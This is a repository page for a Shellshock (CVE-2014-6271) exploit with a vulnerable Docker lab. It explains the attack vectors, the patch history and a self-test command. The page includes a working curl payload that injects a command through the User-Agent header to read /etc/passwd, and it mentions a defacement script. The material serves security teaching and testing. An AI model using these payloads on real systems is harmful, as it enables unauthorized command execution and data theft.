• Stars
    star
    203
  • Rank 192,890 (Top 4 %)
  • Language
    Shell
  • License
    GNU General Publi...
  • Created almost 8 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Shellshock exploit + vulnerable environment

Logo

Shellshock exploit + vulnerable environment

Docker Pulls

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Run a vulnerable environment

You will need docker installed to run the environment, go to docker.com and install it if you don't have it yet.

To start the vulnerable environment just run

docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271

Open your browser and go to localhost:8080, if everything is OK you will see a page like this

vulnerable

Exploit

There are several ways to exploit this flaw

Exploit it with one liner

An simple example to cat /etc/passwd

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

You can use it to run any command that you want

Exploit for defacement

This is just a sample code in exploit-deface.sh, just run it against the image

./exploit-deface.sh <ip> <port>

For example if you are running it with the command provided above

./exploit-deface.sh localhost 8080

Just refresh your browser and you will see

Deface

Test your system

Just run this bash script in your system and you will see if you are vulnerable or not:

env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

Exploitation Vectors

CGI-based web server

When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. Security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked." and other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.

OpenSSH server

OpenSSH has a "ForceCommand" feature, where a fixed command is executed when the user logs in, instead of just running an unrestricted command shell. The fixed command is executed even if the user specified that another command should be run; in that case the original command is put into the environment variable "SSH_ORIGINAL_COMMAND". When the forced command is run in a Bash shell (if the user's shell is set to Bash), the Bash shell will parse the SSH_ORIGINAL_COMMAND environment variable on start-up, and run the commands embedded in it. The user has used their restricted shell access to gain unrestricted shell access, using the Shellshock bug.

DHCP clients

Some DHCP clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.

Qmail server

When using Bash to process email messages (e.g. through .forward or qmail-alias piping), the qmail mail server passes external input through in a way that can exploit a vulnerable version of Bash.

IBM HMC restricted shell

The bug can be exploited to gain access to Bash from the restricted shell of the IBM Hardware Management Console, a tiny Linux variant for system administrators. IBM released a patch to resolve this.

Fix

iUntil 24 September 2014, Bash maintainer Chet Ramey provided a patch version bash43-025 of Bash 4.3 addressing CVE-2014-6271, which was already packaged by distribution maintainers. On 24 September, bash43-026 followed, addressing CVE-2014-7169. Then CVE-2014-7186 was discovered. Florian Weimer from Red Hat posted some patch code for this "unofficially" on 25 September, which Ramey incorporated into Bash as bash43-027. These patches provided code only, helpful only for those who know how to compile ("rebuild") a new Bash binary executable file from the patch file and remaining source code files.

The next day, Red Hat officially presented according updates for Red Hat Enterprise Linux, after another day for Fedora 21. Canonical Ltd. presented updates for its Ubuntu Long Term Support versions on Saturday, 27 September; on Sunday, there were updates for SUSE Linux Enterprise. he following Monday and Tuesday at the end of the month, Apple OS X updates appeared.

On 1 October 2014, Michał Zalewski from Google Inc. finally stated that Weimer's code and bash43-027 had fixed not only the first three bugs but even the remaining three that were published after bash43-027, including his own two discoveries.This means that after the earlier distribution updates, no other updates have been required to cover all the six issues.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (opsxcq) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.

More Repositories

1

exploit-CVE-2016-10033

PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container
PHP
403
star
2

exploit-CVE-2017-7494

SambaCry exploit and vulnerable container (CVE-2017-7494)
C
378
star
3

docker-vulnerable-dvwa

Damn Vulnerable Web Application Docker container
PHP
210
star
4

psx-cue-sbi-collection

Collection of .cue e .sbi files for Playstation roms
Shell
202
star
5

tasker

Tasker is a multipurpose task runner
Java
194
star
6

docker-tor-hiddenservice-nginx

Easily setup a hidden service inside the Tor network
C
169
star
7

mirror-vxheaven.org

Vxheaven.org website's mirror
HTML
155
star
8

exploit-blacknurse

Black Nurse DOS attack
C
71
star
9

proxy-list

A curated list of free public proxy servers
71
star
10

meme-vibing-cat

Vibing Cat meme generator
Shell
68
star
11

mirror-fravia

Fravia's mirror, for old times's sake !
HTML
64
star
12

docker-metasploit

Metasploit framework with steroids
Dockerfile
59
star
13

exploit-cve-2017-5715

Spectre exploit
C
55
star
14

exploit-CVE-2016-6515

OpenSSH remote DOS exploit and vulnerable container
JavaScript
53
star
15

mirror-milw0rm

Milw0rm website's mirror ! For old time's sake !
HTML
45
star
16

docker-tor

TOR Server Docker image
Shell
39
star
17

mirror-textfiles.com

TextFiles.com mirror
Roff
35
star
18

docker-helloworld-http

Docker image to test HTTP load balancers
Shell
34
star
19

docker-dnsmasq

Dockerfile
33
star
20

exploit-CVE-2016-7434

NTPD remote DOS exploit and vulnerable container
C
23
star
21

mirror-blacksun.box.sk

Black Sun website mirror, for old times' sake !
HTML
21
star
22

ipblacklist-database

Blacklist ip addresses caught scanning or bruteforcing hosts
20
star
23

docker-vnc

Run GUI applications inside Docker using VNC
Shell
19
star
24

docker-dev-arduino

Arduino development environment in a container
Shell
17
star
25

docker-xmrig

XMrig miner in a container !
Dockerfile
15
star
26

exploit-phpldapadmin-remote-dump

phpldapadmin remote exploit and vulnerable container !
PHP
13
star
27

ansible-role-linux-desktop

Ansible role for a Debian desktop
Shell
12
star
28

docker-wayback-machine

Download websites from Archive.org in a docker container !
12
star
29

docker-transmission

Dockerized Transmission, the most popular opensource Torrent Client
Shell
12
star
30

mirror-cultdeadcow.com

Cult of Dead Cow website's mirror !
HTML
11
star
31

packer-ah

AH Executable Packer
Pascal
11
star
32

arduino-temperature-monitor

Full stack Arduino temperature monitor
C++
11
star
33

malware-sample-banker-FEFAD618EB6177F07826D68A895769A8

Brazilian banker malware identified by Notificacao_Infracao_De_Transito_99827462345231.js
11
star
34

mirror-hack.co.za

Hack.co.za old website mirror
C
10
star
35

ansible-role-linux-server

Basic role to setup Debian as a server
Shell
10
star
36

docker-devops

Devops toolbox in a box
Dockerfile
9
star
37

blog

https://strm.sh website source code
TeX
9
star
38

docker-wine

Wine in a container !
8
star
39

disassembler-borg

Borg disassembler 2.28
C++
8
star
40

docker-snapcast

Snapcast stream server in a docker container !
Dockerfile
7
star
41

debugger-netwalker

NetWalker Debugger
Assembly
7
star
42

mirror-acid.org

ACiD Productions website's mirror
HTML
7
star
43

exploit-MS09-050

Microsoft Windows 7 SMB2.0 Remote Blue Screen of Death
Java
6
star
44

patch-fallout-1-null-pointer

Patch for Fallout 1 to fix a null pointer on a certain map event
C
5
star
45

docker-bitcoind

Bitcoin Daemon server
Dockerfile
5
star
46

linux-web-controller

Simple Linux web interface to run some scripts
Python
5
star
47

exploit-CVE-2016-8016-25

McAfee Virus Scan for Linux multiple remote flaws (CVE 2016-8016, CVE 2016-8017, CVE 2016-8018, CVE 2016-8019, CVE 2016-8020, CVE 2016-8021, CVE 2016-8022, CVE 2016-8023, CVE 2016-8024, CVE 2016-8025)
5
star
48

ansible-role-host-backup

Host backup role for linux with GPG encryption and upload to S3
4
star
49

docker-qemu

Qemu and KVM in a container !
Dockerfile
4
star
50

prometheus-exporter-fujitsu

Fujitsu RX300 exporter for Prometheus
Go
4
star
51

cloralang

Clora Programming Language for Code Golfing
JavaScript
4
star
52

docker-openvpn

OpenVPN running in a container
Dockerfile
4
star
53

ansible-role-linux-maintenance

Debian 10 Ansible maintenance role
4
star
54

opsxcq

3
star
55

docker-telegram

Telegram in a container !
Dockerfile
3
star
56

docker-util-latex

Easily build your LaTeX documents in a container !
Shell
3
star
57

docker-apache

Vanilla apache with php in a container !
Shell
3
star
58

docker-nginx-balancer

[DEPRECATED] A simple load balancer with NGinx
Shell
3
star
59

docker-apt-cacher

Apt-get cache for faster builds
Dockerfile
2
star
60

docker-dev-linuxkit

Linuxkit development environment
Dockerfile
2
star
61

docker-dev-vue

Vuejs 2 development environment with vue-cli and yarn
Dockerfile
2
star
62

docker-dev-cpp

C and C++ development environment
C
2
star
63

docker-filebot

Filebot media organizer container
Dockerfile
2
star
64

docker-pystemon

Pystemon dockerized
Shell
2
star
65

docker-deluge

Deluge torrent daemon in a container
Shell
2
star
66

docker-test-git-ssh-server

Git server over ssh for integration tests
Shell
2
star
67

dev-node-brunch

Nodejs + Brunch development environment
1
star
68

ansible-role-samba

Ansible role for running Samba in a container
1
star
69

docker-mopidy

Mopidy network music player with google music support
Python
1
star
70

dev-kickstart

Build virtual machines with kickstart in a container !
Shell
1
star
71

docker-samba

Samba image for docker
Shell
1
star
72

docker-task-base

Docker base image for tasks, with curl, git, wget, python and a lot more !
1
star
73

docker-gmusic-uploader

Google Music Uploader in a container !
Python
1
star
74

docker-task

[DEPRECATED] A simple way to tasks in a container in intervals
Python
1
star